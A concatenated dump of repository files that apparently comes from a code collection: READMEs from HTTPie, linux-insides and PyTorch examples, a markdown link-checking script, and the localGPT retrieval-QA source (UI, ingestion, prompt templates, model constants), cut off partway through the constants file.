Visit the [HTTPie website](https://httpie.io) for full documentation and useful links. - Join our [Discord server](https://httpie.io/discord) is to ask questions, discuss features, and for general API chat. - Tweet at [@httpie](https://twitter.com/httpie) on Twitter. - Use [StackOverflow](https://stackoverflow.com/questions/tagged/httpie) to ask questions and include a `httpie` tag. - Create [GitHub Issues](https://github.com/httpie/cli/issues) for bug reports and feature requests. - Subscribe to the [HTTPie newsletter](https://httpie.io) for occasional updates. ## Contributing Have a look through existing [Issues](https://github.com/httpie/cli/issues) and [Pull Requests](https://github.com/httpie/cli/pulls) that you could help with. If you'd like to request a feature or report a bug, please [create a GitHub Issue](https://github.com/httpie/cli/issues) using one of the templates provided. [See contribution guide →](https://github.com/httpie/cli/blob/master/CONTRIBUTING.md)
linux-insides
0995b4bc531fcf29b4431ecf0e29aa86e66838f4
File: Scripts/get_all_links.py #!/usr/bin/env python from __future__ import print_function from socket import timeout import os import sys import codecs import re import markdown try: # compatible for python2 from urllib2 import urlopen from urllib2 import HTTPError from urllib2 import URLError except ImportError: # compatible for python3 from urllib.request import urlopen from urllib.error import HTTPError from urllib.error import URLError def check_live_url(url): result = False try: ret = urlopen(url, timeout=2) result = (ret.code == 200) except HTTPError as e: print(e, file=sys.stderr) except URLError as e: print(e, file=sys.stderr) except timeout as e: print(e, file=sys.stderr) except Exception as e: print(e, file=sys.stderr) return result def main(path): filenames = [] for (dirpath, dnames, fnames) in os.walk(path): for fname in fnames: if fname.endswith('.md'): filenames.append(os.sep.join([dirpath, fname])) urls = [] for filename in filenames: fd = codecs.open(filename, mode="r", encoding="utf-8") for line in fd.readlines(): refs = re.findall(r'(?<=<a href=")[^"]*', markdown.markdown(line)) for ref in refs: if ref not in urls: urls.append(ref) fd.close() for url in urls: if not url.startswith("http"): print("markdown file name: " + url) continue if check_live_url(url): print(url) else: print(url, file=sys.stderr) if __name__ == '__main__': if len(sys.argv) == 2: main(sys.argv[1]) else: print("Choose one path as argument one")
linux-insides =============== A book-in-progress about the linux kernel and its insides. **The goal is simple** - to share my modest knowledge about the insides of the linux kernel and help people who are interested in linux kernel insides, and other low-level subject matter. Feel free to go through the book [Start here](https://github.com/0xAX/linux-insides/blob/master/SUMMARY.md) **Questions/Suggestions**: Feel free about any questions or suggestions by pinging me at twitter [@0xAX](https://twitter.com/0xAX), adding an [issue](https://github.com/0xAX/linux-insides/issues/new) or just drop me an [email](mailto:[email protected]). Generating eBooks and PDFs - [documentation](https://github.com/GitbookIO/gitbook/blob/master/docs/ebook.md) # Mailing List We have a Google Group mailing list for learning the kernel source code. Here are some instructions about how to use it. #### Join Send an email with any subject/content to `[email protected]`. Then you will receive a confirmation email. Reply it with any content and then you are done. > If you have Google account, you can also open the [archive page](https://groups.google.com/forum/#!forum/kernelhacking) and click **Apply to join group**. You will be approved automatically. #### Send emails to mailing list Just send emails to `[email protected]`. The basic usage is the same as other mailing lists powered by mailman. #### Archives https://groups.google.com/forum/#!forum/kernelhacking On other languages ------------------- * [Brazilian Portuguese](https://github.com/mauri870/linux-insides) * [Chinese](https://github.com/MintCN/linux-insides-zh) * [Japanese](https://github.com/tkmru/linux-insides-ja) * [Korean](https://github.com/junsooo/linux-insides-ko) * [Russian](https://github.com/proninyaroslav/linux-insides-ru) * [Spanish](https://github.com/leolas95/linux-insides) * [Turkish](https://github.com/ayyucedemirbas/linux-insides_Turkish) Docker ------ In order to run your own copy of the book with gitbook within a local container: 1. Enable Docker experimental features with vim or another text editor ```bash sudo vim /usr/lib/systemd/system/docker.service ``` Then add --experimental=true to the end of the ExecStart=/usr/bin/dockerd -H fd:// line and save. Eg: *ExecStart=/usr/bin/dockerd -H fd:// --experimental=true* Then, you need to reload and restart the Docker daemon: ```bash systemctl daemon-reload systemctl restart docker.service ``` 2. Run docker image ```bash make run ``` 3. Open your local copy of linux insides book under this url http://localhost:4000 or run `make browse` Contributions -------------- Feel free to create issues or pull-requests if you have any problems. **Please read [CONTRIBUTING.md](https://github.com/0xAX/linux-insides/blob/master/CONTRIBUTING.md) before pushing any changes.** ![linux-kernel](Assets/linux-kernel.png) Author --------------- [@0xAX](https://twitter.com/0xAX) LICENSE ------------- Licensed [BY-NC-SA Creative Commons](http://creativecommons.org/licenses/by-nc-sa/4.0/).
examples
26de41904319c7094afc53a3ee809de47112d387
# PyTorch Examples ![Run Examples](https://github.com/pytorch/examples/workflows/Run%20Examples/badge.svg) https://pytorch.org/examples/ `pytorch/examples` is a repository showcasing examples of using [PyTorch](https://github.com/pytorch/pytorch). The goal is to have curated, short, few/no dependencies _high quality_ examples that are substantially different from each other that can be emulated in your existing work. - For tutorials: https://github.com/pytorch/tutorials - For changes to pytorch.org: https://github.com/pytorch/pytorch.github.io - For a general model hub: https://pytorch.org/hub/ or https://huggingface.co/models - For recipes on how to run PyTorch in production: https://github.com/facebookresearch/recipes - For general Q&A and support: https://discuss.pytorch.org/ ## Available models - [Image classification (MNIST) using Convnets](./mnist/README.md) - [Word-level Language Modeling using RNN and Transformer](./word_language_model/README.md) - [Training Imagenet Classifiers with Popular Networks](./imagenet/README.md) - [Generative Adversarial Networks (DCGAN)](./dcgan/README.md) - [Variational Auto-Encoders](./vae/README.md) - [Superresolution using an efficient sub-pixel convolutional neural network](./super_resolution/README.md) - [Hogwild training of shared ConvNets across multiple processes on MNIST](mnist_hogwild) - [Training a CartPole to balance in OpenAI Gym with actor-critic](./reinforcement_learning/README.md) - [Natural Language Inference (SNLI) with GloVe vectors, LSTMs, and torchtext](snli) - [Time sequence prediction - use an LSTM to learn Sine waves](./time_sequence_prediction/README.md) - [Implement the Neural Style Transfer algorithm on images](./fast_neural_style/README.md) - [Reinforcement Learning with Actor Critic and REINFORCE algorithms on OpenAI gym](./reinforcement_learning/README.md) - [PyTorch Module Transformations using fx](./fx/README.md) - Distributed PyTorch examples with [Distributed Data Parallel](./distributed/ddp/README.md) and [RPC](./distributed/rpc) - [Several examples illustrating the C++ Frontend](cpp) - [Image Classification Using Forward-Forward](./mnist_forward_forward/README.md) - [Language Translation using Transformers](./language_translation/README.md) Additionally, a list of good examples hosted in their own repositories: - [Neural Machine Translation using sequence-to-sequence RNN with attention (OpenNMT)](https://github.com/OpenNMT/OpenNMT-py) ## Contributing If you'd like to contribute your own example or fix a bug please make sure to take a look at [CONTRIBUTING.md](CONTRIBUTING.md).
localGPT
a1dea3becb8b1ae28a87369b1636c4c4a4501c27
File: localGPT_UI.py import torch import subprocess import streamlit as st from run_localGPT import load_model from langchain.vectorstores import Chroma from constants import CHROMA_SETTINGS, EMBEDDING_MODEL_NAME, PERSIST_DIRECTORY, MODEL_ID, MODEL_BASENAME from langchain.embeddings import HuggingFaceInstructEmbeddings from langchain.chains import RetrievalQA from streamlit_extras.add_vertical_space import add_vertical_space from langchain.prompts import PromptTemplate from langchain.memory import ConversationBufferMemory def model_memory(): # Adding history to the model. template = """Use the following pieces of context to answer the question at the end. If you don't know the answer,\ just say that you don't know, don't try to make up an answer. {context} {history} Question: {question} Helpful Answer:""" prompt = PromptTemplate(input_variables=["history", "context", "question"], template=template) memory = ConversationBufferMemory(input_key="question", memory_key="history") return prompt, memory # Sidebar contents with st.sidebar: st.title("🤗💬 Converse with your Data") st.markdown( """ ## About This app is an LLM-powered chatbot built using: - [Streamlit](https://streamlit.io/) - [LangChain](https://python.langchain.com/) - [LocalGPT](https://github.com/PromtEngineer/localGPT) """ ) add_vertical_space(5) st.write("Made with ❤️ by [Prompt Engineer](https://youtube.com/@engineerprompt)") if torch.backends.mps.is_available(): DEVICE_TYPE = "mps" elif torch.cuda.is_available(): DEVICE_TYPE = "cuda" else: DEVICE_TYPE = "cpu" # if "result" not in st.session_state: # # Run the document ingestion process. # run_langest_commands = ["python", "ingest.py"] # run_langest_commands.append("--device_type") # run_langest_commands.append(DEVICE_TYPE) # result = subprocess.run(run_langest_commands, capture_output=True) # st.session_state.result = result # Define the retreiver # load the vectorstore if "EMBEDDINGS" not in st.session_state: EMBEDDINGS = HuggingFaceInstructEmbeddings(model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": DEVICE_TYPE}) st.session_state.EMBEDDINGS = EMBEDDINGS if "DB" not in st.session_state: DB = Chroma( persist_directory=PERSIST_DIRECTORY, embedding_function=st.session_state.EMBEDDINGS, client_settings=CHROMA_SETTINGS, ) st.session_state.DB = DB if "RETRIEVER" not in st.session_state: RETRIEVER = DB.as_retriever() st.session_state.RETRIEVER = RETRIEVER if "LLM" not in st.session_state: LLM = load_model(device_type=DEVICE_TYPE, model_id=MODEL_ID, model_basename=MODEL_BASENAME) st.session_state["LLM"] = LLM if "QA" not in st.session_state: prompt, memory = model_memory() QA = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=RETRIEVER, return_source_documents=True, chain_type_kwargs={"prompt": prompt, "memory": memory}, ) st.session_state["QA"] = QA st.title("LocalGPT App 💬") # Create a text input box for the user prompt = st.text_input("Input your prompt here") # while True: # If the user hits enter if prompt: # Then pass the prompt to the LLM response = st.session_state["QA"](prompt) answer, docs = response["result"], response["source_documents"] # ...and write it out to the screen st.write(answer) # With a streamlit expander with st.expander("Document Similarity Search"): # Find the relevant pages search = st.session_state.DB.similarity_search_with_score(prompt) # Write out the first for i, doc in enumerate(search): # print(doc) st.write(f"Source Document # {i+1} : {doc[0].metadata['source'].split('/')[-1]}") st.write(doc[0].page_content) st.write("--------------------------------") File: crawl.py import os import shutil import click import subprocess from constants import ( DOCUMENT_MAP, SOURCE_DIRECTORY ) def logToFile(logentry): file1 = open("crawl.log","a") file1.write(logentry + "\n") file1.close() print(logentry + "\n") @click.command() @click.option( "--device_type", default="cuda", type=click.Choice( [ "cpu", "cuda", "ipu", "xpu", "mkldnn", "opengl", "opencl", "ideep", "hip", "ve", "fpga", "ort", "xla", "lazy", "vulkan", "mps", "meta", "hpu", "mtia", ], ), help="Device to run on. (Default is cuda)", ) @click.option( "--landing_directory", default="./LANDING_DOCUMENTS" ) @click.option( "--processed_directory", default="./PROCESSED_DOCUMENTS" ) @click.option( "--error_directory", default="./ERROR_DOCUMENTS" ) @click.option( "--unsupported_directory", default="./UNSUPPORTED_DOCUMENTS" ) def main(device_type, landing_directory, processed_directory, error_directory, unsupported_directory): paths = [] os.makedirs(processed_directory, exist_ok=True) os.makedirs(error_directory, exist_ok=True) os.makedirs(unsupported_directory, exist_ok=True) for root, _, files in os.walk(landing_directory): for file_name in files: file_extension = os.path.splitext(file_name)[1] short_filename = os.path.basename(file_name) if not os.path.isdir(root + "/" + file_name): if file_extension in DOCUMENT_MAP.keys(): shutil.move(root + "/" + file_name, SOURCE_DIRECTORY+ "/" + short_filename) logToFile("START: " + root + "/" + short_filename) process = subprocess.Popen("python ingest.py --device_type=" + device_type, shell=True, stdout=subprocess.PIPE) process.wait() if process.returncode > 0: shutil.move(SOURCE_DIRECTORY + "/" + short_filename, error_directory + "/" + short_filename) logToFile("ERROR: " + root + "/" + short_filename) else: logToFile("VALID: " + root + "/" + short_filename) shutil.move(SOURCE_DIRECTORY + "/" + short_filename, processed_directory+ "/" + short_filename) else: shutil.move(root + "/" + file_name, unsupported_directory+ "/" + short_filename) if __name__ == "__main__": main() File: ingest.py import logging import os from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, as_completed import click import torch from langchain.docstore.document import Document from langchain.text_splitter import Language, RecursiveCharacterTextSplitter from langchain.vectorstores import Chroma from utils import get_embeddings from constants import ( CHROMA_SETTINGS, DOCUMENT_MAP, EMBEDDING_MODEL_NAME, INGEST_THREADS, PERSIST_DIRECTORY, SOURCE_DIRECTORY, ) def file_log(logentry): file1 = open("file_ingest.log", "a") file1.write(logentry + "\n") file1.close() print(logentry + "\n") def load_single_document(file_path: str) -> Document: # Loads a single document from a file path try: file_extension = os.path.splitext(file_path)[1] loader_class = DOCUMENT_MAP.get(file_extension) if loader_class: file_log(file_path + " loaded.") loader = loader_class(file_path) else: file_log(file_path + " document type is undefined.") raise ValueError("Document type is undefined") return loader.load()[0] except Exception as ex: file_log("%s loading error: \n%s" % (file_path, ex)) return None def load_document_batch(filepaths): logging.info("Loading document batch") # create a thread pool with ThreadPoolExecutor(len(filepaths)) as exe: # load files futures = [exe.submit(load_single_document, name) for name in filepaths] # collect data if futures is None: file_log(name + " failed to submit") return None else: data_list = [future.result() for future in futures] # return data and file paths return (data_list, filepaths) def load_documents(source_dir: str) -> list[Document]: # Loads all documents from the source documents directory, including nested folders paths = [] for root, _, files in os.walk(source_dir): for file_name in files: print("Importing: " + file_name) file_extension = os.path.splitext(file_name)[1] source_file_path = os.path.join(root, file_name) if file_extension in DOCUMENT_MAP.keys(): paths.append(source_file_path) # Have at least one worker and at most INGEST_THREADS workers n_workers = min(INGEST_THREADS, max(len(paths), 1)) chunksize = round(len(paths) / n_workers) docs = [] with ProcessPoolExecutor(n_workers) as executor: futures = [] # split the load operations into chunks for i in range(0, len(paths), chunksize): # select a chunk of filenames filepaths = paths[i : (i + chunksize)] # submit the task try: future = executor.submit(load_document_batch, filepaths) except Exception as ex: file_log("executor task failed: %s" % (ex)) future = None if future is not None: futures.append(future) # process all results for future in as_completed(futures): # open the file and load the data try: contents, _ = future.result() docs.extend(contents) except Exception as ex: file_log("Exception: %s" % (ex)) return docs def split_documents(documents: list[Document]) -> tuple[list[Document], list[Document]]: # Splits documents for correct Text Splitter text_docs, python_docs = [], [] for doc in documents: if doc is not None: file_extension = os.path.splitext(doc.metadata["source"])[1] if file_extension == ".py": python_docs.append(doc) else: text_docs.append(doc) return text_docs, python_docs @click.command() @click.option( "--device_type", default="cuda" if torch.cuda.is_available() else "cpu", type=click.Choice( [ "cpu", "cuda", "ipu", "xpu", "mkldnn", "opengl", "opencl", "ideep", "hip", "ve", "fpga", "ort", "xla", "lazy", "vulkan", "mps", "meta", "hpu", "mtia", ], ), help="Device to run on. (Default is cuda)", ) def main(device_type): # Load documents and split in chunks logging.info(f"Loading documents from {SOURCE_DIRECTORY}") documents = load_documents(SOURCE_DIRECTORY) text_documents, python_documents = split_documents(documents) text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=200) python_splitter = RecursiveCharacterTextSplitter.from_language( language=Language.PYTHON, chunk_size=880, chunk_overlap=200 ) texts = text_splitter.split_documents(text_documents) texts.extend(python_splitter.split_documents(python_documents)) logging.info(f"Loaded {len(documents)} documents from {SOURCE_DIRECTORY}") logging.info(f"Split into {len(texts)} chunks of text") """ (1) Chooses an appropriate langchain library based on the enbedding model name. Matching code is contained within fun_localGPT.py. (2) Provides additional arguments for instructor and BGE models to improve results, pursuant to the instructions contained on their respective huggingface repository, project page or github repository. """ embeddings = get_embeddings(device_type) logging.info(f"Loaded embeddings from {EMBEDDING_MODEL_NAME}") db = Chroma.from_documents( texts, embeddings, persist_directory=PERSIST_DIRECTORY, client_settings=CHROMA_SETTINGS, ) if __name__ == "__main__": logging.basicConfig( format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s", level=logging.INFO ) main() File: prompt_template_utils.py """ This file implements prompt template for llama based models. Modify the prompt template based on the model you select. This seems to have significant impact on the output of the LLM. """ from langchain.memory import ConversationBufferMemory from langchain.prompts import PromptTemplate # this is specific to Llama-2. system_prompt = """You are a helpful assistant, you will use the provided context to answer user questions. Read the given context before answering questions and think step by step. If you can not answer a user question based on the provided context, inform the user. Do not use any other information for answering user. Provide a detailed answer to the question.""" def get_prompt_template(system_prompt=system_prompt, promptTemplate_type=None, history=False): if promptTemplate_type == "llama": B_INST, E_INST = "[INST]", "[/INST]" B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n" SYSTEM_PROMPT = B_SYS + system_prompt + E_SYS if history: instruction = """ Context: {history} \n {context} User: {question}""" prompt_template = B_INST + SYSTEM_PROMPT + instruction + E_INST prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: instruction = """ Context: {context} User: {question}""" prompt_template = B_INST + SYSTEM_PROMPT + instruction + E_INST prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) elif promptTemplate_type == "llama3": B_INST, E_INST = "<|start_header_id|>user<|end_header_id|>", "<|eot_id|>" B_SYS, E_SYS = "<|begin_of_text|><|start_header_id|>system<|end_header_id|> ", "<|eot_id|>" ASSISTANT_INST = "<|start_header_id|>assistant<|end_header_id|>" SYSTEM_PROMPT = B_SYS + system_prompt + E_SYS if history: instruction = """ Context: {history} \n {context} User: {question}""" prompt_template = SYSTEM_PROMPT + B_INST + instruction + ASSISTANT_INST prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: instruction = """ Context: {context} User: {question}""" prompt_template = SYSTEM_PROMPT + B_INST + instruction + ASSISTANT_INST prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) elif promptTemplate_type == "mistral": B_INST, E_INST = "<s>[INST] ", " [/INST]" if history: prompt_template = ( B_INST + system_prompt + """ Context: {history} \n {context} User: {question}""" + E_INST ) prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: prompt_template = ( B_INST + system_prompt + """ Context: {context} User: {question}""" + E_INST ) prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) else: # change this based on the model you have selected. if history: prompt_template = ( system_prompt + """ Context: {history} \n {context} User: {question} Answer:""" ) prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: prompt_template = ( system_prompt + """ Context: {context} User: {question} Answer:""" ) prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) memory = ConversationBufferMemory(input_key="question", memory_key="history") print(f"Here is the prompt used: {prompt}") return ( prompt, memory, ) File: run_localGPT.py import os import logging import click import torch import utils from langchain.chains import RetrievalQA from langchain.embeddings import HuggingFaceInstructEmbeddings from langchain.llms import HuggingFacePipeline from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler # for streaming response from langchain.callbacks.manager import CallbackManager callback_manager = CallbackManager([StreamingStdOutCallbackHandler()]) from prompt_template_utils import get_prompt_template from utils import get_embeddings # from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler from langchain.vectorstores import Chroma from transformers import ( GenerationConfig, pipeline, ) from load_models import ( load_quantized_model_awq, load_quantized_model_gguf_ggml, load_quantized_model_qptq, load_full_model, ) from constants import ( EMBEDDING_MODEL_NAME, PERSIST_DIRECTORY, MODEL_ID, MODEL_BASENAME, MAX_NEW_TOKENS, MODELS_PATH, CHROMA_SETTINGS, ) def load_model(device_type, model_id, model_basename=None, LOGGING=logging): """ Select a model for text generation using the HuggingFace library. If you are running this for the first time, it will download a model for you. subsequent runs will use the model from the disk. Args: device_type (str): Type of device to use, e.g., "cuda" for GPU or "cpu" for CPU. model_id (str): Identifier of the model to load from HuggingFace's model hub. model_basename (str, optional): Basename of the model if using quantized models. Defaults to None. Returns: HuggingFacePipeline: A pipeline object for text generation using the loaded model. Raises: ValueError: If an unsupported model or device type is provided. """ logging.info(f"Loading Model: {model_id}, on: {device_type}") logging.info("This action can take a few minutes!") if model_basename is not None: if ".gguf" in model_basename.lower(): llm = load_quantized_model_gguf_ggml(model_id, model_basename, device_type, LOGGING) return llm elif ".ggml" in model_basename.lower(): model, tokenizer = load_quantized_model_gguf_ggml(model_id, model_basename, device_type, LOGGING) elif ".awq" in model_basename.lower(): model, tokenizer = load_quantized_model_awq(model_id, LOGGING) else: model, tokenizer = load_quantized_model_qptq(model_id, model_basename, device_type, LOGGING) else: model, tokenizer = load_full_model(model_id, model_basename, device_type, LOGGING) # Load configuration from the model to avoid warnings generation_config = GenerationConfig.from_pretrained(model_id) # see here for details: # https://huggingface.co/docs/transformers/ # main_classes/text_generation#transformers.GenerationConfig.from_pretrained.returns # Create a pipeline for text generation pipe = pipeline( "text-generation", model=model, tokenizer=tokenizer, max_length=MAX_NEW_TOKENS, temperature=0.2, # top_p=0.95, repetition_penalty=1.15, generation_config=generation_config, ) local_llm = HuggingFacePipeline(pipeline=pipe) logging.info("Local LLM Loaded") return local_llm def retrieval_qa_pipline(device_type, use_history, promptTemplate_type="llama"): """ Initializes and returns a retrieval-based Question Answering (QA) pipeline. This function sets up a QA system that retrieves relevant information using embeddings from the HuggingFace library. It then answers questions based on the retrieved information. Parameters: - device_type (str): Specifies the type of device where the model will run, e.g., 'cpu', 'cuda', etc. - use_history (bool): Flag to determine whether to use chat history or not. Returns: - RetrievalQA: An initialized retrieval-based QA system. Notes: - The function uses embeddings from the HuggingFace library, either instruction-based or regular. - The Chroma class is used to load a vector store containing pre-computed embeddings. - The retriever fetches relevant documents or data based on a query. - The prompt and memory, obtained from the `get_prompt_template` function, might be used in the QA system. - The model is loaded onto the specified device using its ID and basename. - The QA system retrieves relevant documents using the retriever and then answers questions based on those documents. """ """ (1) Chooses an appropriate langchain library based on the enbedding model name. Matching code is contained within ingest.py. (2) Provides additional arguments for instructor and BGE models to improve results, pursuant to the instructions contained on their respective huggingface repository, project page or github repository. """ embeddings = get_embeddings(device_type) logging.info(f"Loaded embeddings from {EMBEDDING_MODEL_NAME}") # load the vectorstore db = Chroma(persist_directory=PERSIST_DIRECTORY, embedding_function=embeddings, client_settings=CHROMA_SETTINGS) retriever = db.as_retriever() # get the prompt template and memory if set by the user. prompt, memory = get_prompt_template(promptTemplate_type=promptTemplate_type, history=use_history) # load the llm pipeline llm = load_model(device_type, model_id=MODEL_ID, model_basename=MODEL_BASENAME, LOGGING=logging) if use_history: qa = RetrievalQA.from_chain_type( llm=llm, chain_type="stuff", # try other chains types as well. refine, map_reduce, map_rerank retriever=retriever, return_source_documents=True, # verbose=True, callbacks=callback_manager, chain_type_kwargs={"prompt": prompt, "memory": memory}, ) else: qa = RetrievalQA.from_chain_type( llm=llm, chain_type="stuff", # try other chains types as well. refine, map_reduce, map_rerank retriever=retriever, return_source_documents=True, # verbose=True, callbacks=callback_manager, chain_type_kwargs={ "prompt": prompt, }, ) return qa # chose device typ to run on as well as to show source documents. @click.command() @click.option( "--device_type", default="cuda" if torch.cuda.is_available() else "cpu", type=click.Choice( [ "cpu", "cuda", "ipu", "xpu", "mkldnn", "opengl", "opencl", "ideep", "hip", "ve", "fpga", "ort", "xla", "lazy", "vulkan", "mps", "meta", "hpu", "mtia", ], ), help="Device to run on. (Default is cuda)", ) @click.option( "--show_sources", "-s", is_flag=True, help="Show sources along with answers (Default is False)", ) @click.option( "--use_history", "-h", is_flag=True, help="Use history (Default is False)", ) @click.option( "--model_type", default="llama3", type=click.Choice( ["llama3", "llama", "mistral", "non_llama"], ), help="model type, llama3, llama, mistral or non_llama", ) @click.option( "--save_qa", is_flag=True, help="whether to save Q&A pairs to a CSV file (Default is False)", ) def main(device_type, show_sources, use_history, model_type, save_qa): """ Implements the main information retrieval task for a localGPT. This function sets up the QA system by loading the necessary embeddings, vectorstore, and LLM model. It then enters an interactive loop where the user can input queries and receive answers. Optionally, the source documents used to derive the answers can also be displayed. Parameters: - device_type (str): Specifies the type of device where the model will run, e.g., 'cpu', 'mps', 'cuda', etc. - show_sources (bool): Flag to determine whether to display the source documents used for answering. - use_history (bool): Flag to determine whether to use chat history or not. Notes: - Logging information includes the device type, whether source documents are displayed, and the use of history. - If the models directory does not exist, it creates a new one to store models. - The user can exit the interactive loop by entering "exit". - The source documents are displayed if the show_sources flag is set to True. """ logging.info(f"Running on: {device_type}") logging.info(f"Display Source Documents set to: {show_sources}") logging.info(f"Use history set to: {use_history}") # check if models directory do not exist, create a new one and store models here. if not os.path.exists(MODELS_PATH): os.mkdir(MODELS_PATH) qa = retrieval_qa_pipline(device_type, use_history, promptTemplate_type=model_type) # Interactive questions and answers while True: query = input("\nEnter a query: ") if query == "exit": break # Get the answer from the chain res = qa(query) answer, docs = res["result"], res["source_documents"] # Print the result print("\n\n> Question:") print(query) print("\n> Answer:") print(answer) if show_sources: # this is a flag that you can set to disable showing answers. # # Print the relevant sources used for the answer print("----------------------------------SOURCE DOCUMENTS---------------------------") for document in docs: print("\n> " + document.metadata["source"] + ":") print(document.page_content) print("----------------------------------SOURCE DOCUMENTS---------------------------") # Log the Q&A to CSV only if save_qa is True if save_qa: utils.log_to_csv(query, answer) if __name__ == "__main__": logging.basicConfig( format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s", level=logging.INFO ) main() File: constants.py import os # from dotenv import load_dotenv from chromadb.config import Settings # https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/excel.html?highlight=xlsx#microsoft-excel from langchain.document_loaders import CSVLoader, PDFMinerLoader, TextLoader, UnstructuredExcelLoader, Docx2txtLoader from langchain.document_loaders import UnstructuredFileLoader, UnstructuredMarkdownLoader from langchain.document_loaders import UnstructuredHTMLLoader # load_dotenv() ROOT_DIRECTORY = os.path.dirname(os.path.realpath(__file__)) # Define the folder for storing database SOURCE_DIRECTORY = f"{ROOT_DIRECTORY}/SOURCE_DOCUMENTS" PERSIST_DIRECTORY = f"{ROOT_DIRECTORY}/DB" MODELS_PATH = "./models" # Can be changed to a specific number INGEST_THREADS = os.cpu_count() or 8 # Define the Chroma settings CHROMA_SETTINGS = Settings( anonymized_telemetry=False, is_persistent=True, ) # Context Window and Max New Tokens CONTEXT_WINDOW_SIZE = 8096 MAX_NEW_TOKENS = CONTEXT_WINDOW_SIZE # int(CONTEXT_WINDOW_SIZE/4) #### If you get a "not enough space in the buffer" error, you should reduce the values below, start with half of the original values and keep halving the value until the error stops appearing N_GPU_LAYERS = 100 # Llama-2-70B has 83 layers N_BATCH = 512 ### From experimenting with the Llama-2-7B-Chat-GGML model on 8GB VRAM, these values work: # N_GPU_LAYERS = 20 # N_BATCH = 512 # https://python.langchain.com/en/latest/_modules/langchain/document_loaders/excel.html#UnstructuredExcelLoader DOCUMENT_MAP = { ".html": UnstructuredHTMLLoader, ".txt": TextLoader, ".md": UnstructuredMarkdownLoader, ".py": TextLoader, # ".pdf": PDFMinerLoader, ".pdf": UnstructuredFileLoader, ".csv": CSVLoader, ".xls": UnstructuredExcelLoader, ".xlsx": UnstructuredExcelLoader, ".docx": Docx2txtLoader, ".doc": Docx2txtLoader, } # Default Instructor Model EMBEDDING_MODEL_NAME = "hkunlp/instructor-large" # Uses 1.5 GB of VRAM (High Accuracy with lower VRAM usage) #### #### OTHER EMBEDDING MODEL OPTIONS #### # EMBEDDING_MODEL_NAME = "hkunlp/instructor-xl" # Uses 5 GB of VRAM (Most Accurate of all models) # EMBEDDING_MODEL_NAME = "intfloat/e5-large-v2" # Uses 1.5 GB of VRAM (A little less accurate than instructor-large) # EMBEDDING_MODEL_NAME = "intfloat/e5-base-v2" # Uses 0.5 GB of VRAM (A good model for lower VRAM GPUs) # EMBEDDING_MODEL_NAME = "all-MiniLM-L6-v2" # Uses 0.2 GB of VRAM (Less accurate but fastest - only requires 150mb of vram) #### #### MULTILINGUAL EMBEDDING MODELS #### # EMBEDDING_MODEL_NAME = "intfloat/multilingual-e5-large" # Uses 2.5 GB of VRAM # EMBEDDING_MODEL_NAME = "intfloat/multilingual-e5-base" # Uses 1.2 GB of VRAM #### SELECT AN OPEN SOURCE LLM (LARGE LANGUAGE MODEL) # Select the Model ID and model_basename # load the LLM for generating Natural Language responses #### GPU VRAM Memory required for LLM Models (ONLY) by Billion Parameter value (B Model) #### Does not include VRAM used by Embedding Models - which use an additional 2GB-7GB of VRAM depending on the model. #### #### (B Model) (float32) (float16) (GPTQ 8bit) (GPTQ 4bit) #### 7b 28 GB 14 GB 7 GB - 9 GB 3.5 GB - 5 GB #### 13b 52 GB 26 GB 13 GB - 15 GB 6.5 GB - 8 GB #### 32b 130 GB 65 GB 32.5 GB - 35 GB 16.25 GB - 19 GB #### 65b 260.8 GB 130.4 GB 65.2 GB - 67 GB 32.6 GB - - 35 GB # MODEL_ID = "TheBloke/Llama-2-7B-Chat-GGML" # MODEL_BASENAME = "llama-2-7b-chat.ggmlv3.q4_0.bin" #### #### (FOR GGUF MODELS) #### # MODEL_ID = "TheBloke/Llama-2-13b-Chat-GGUF" # MODEL_BASENAME = "llama-2-13b-chat.Q4_K_M.gguf" # MODEL_ID = "TheBloke/Llama-2-7b-Chat-GGUF" # MODEL_BASENAME = "llama-2-7b-chat.Q4_K_M.gguf" # MODEL_ID = "QuantFactory/Meta-Llama-3-8B-Instruct-GGUF" # MODEL_BASENAME = "Meta-Llama-3-8B-Instruct.Q4_K_M.gguf" # LLAMA 3 # use for Apple Silicon MODEL_ID = "meta-llama/Meta-Llama-3-8B-Instruct" MODEL_BASENAME = None # LLAMA 3 # use for NVIDIA GPUs # MODEL_ID = "unsloth/llama-3-8b-bnb-4bit" # MODEL_BASENAME = None # MODEL_ID = "TheBloke/Mistral-7B-Instruct-v0.1-GGUF" # MODEL_BASENAME = "mistral-7b-instruct-v0.1.Q8_0.gguf" # MODEL_ID = "TheBloke/Llama-2-70b-Chat-GGUF" # MODEL_BASENAME = "llama-2-70b-chat.Q4_K_M.gguf" #### #### (FOR HF MODELS) #### # MODEL_ID = "NousResearch/Llama-2-7b-chat-hf" # MODEL_BASENAME = None # MODEL_ID = "TheBloke/vicuna-7B-1.1-HF" # MODEL_BASENAME = None # MODEL_ID = "TheBloke/Wizard-Vicuna-7B-Uncensored-HF" # MODEL_ID = "TheBloke/guanaco-7B-HF" # MODEL_ID = 'NousResearch/Nous-Hermes-13b' # Requires ~ 23GB VRAM. Using STransformers # alongside will 100% create OOM on 24GB cards. # llm = load_model(device_type, model_id=model_id) #### #### (FOR GPTQ QUANTIZED) Select a llm model based on your GPU and VRAM GB. Does not include Embedding Models VRAM usage. #### ##### 48GB VRAM Graphics Cards (RTX 6000, RTX A6000 and other 48GB VRAM GPUs) ##### ### 65b GPTQ LLM Models for 48GB GPUs (*** With best embedding model: hkunlp/instructor-xl ***) # MODEL_ID = "TheBloke/guanaco-65B-GPTQ" # MODEL_BASENAME 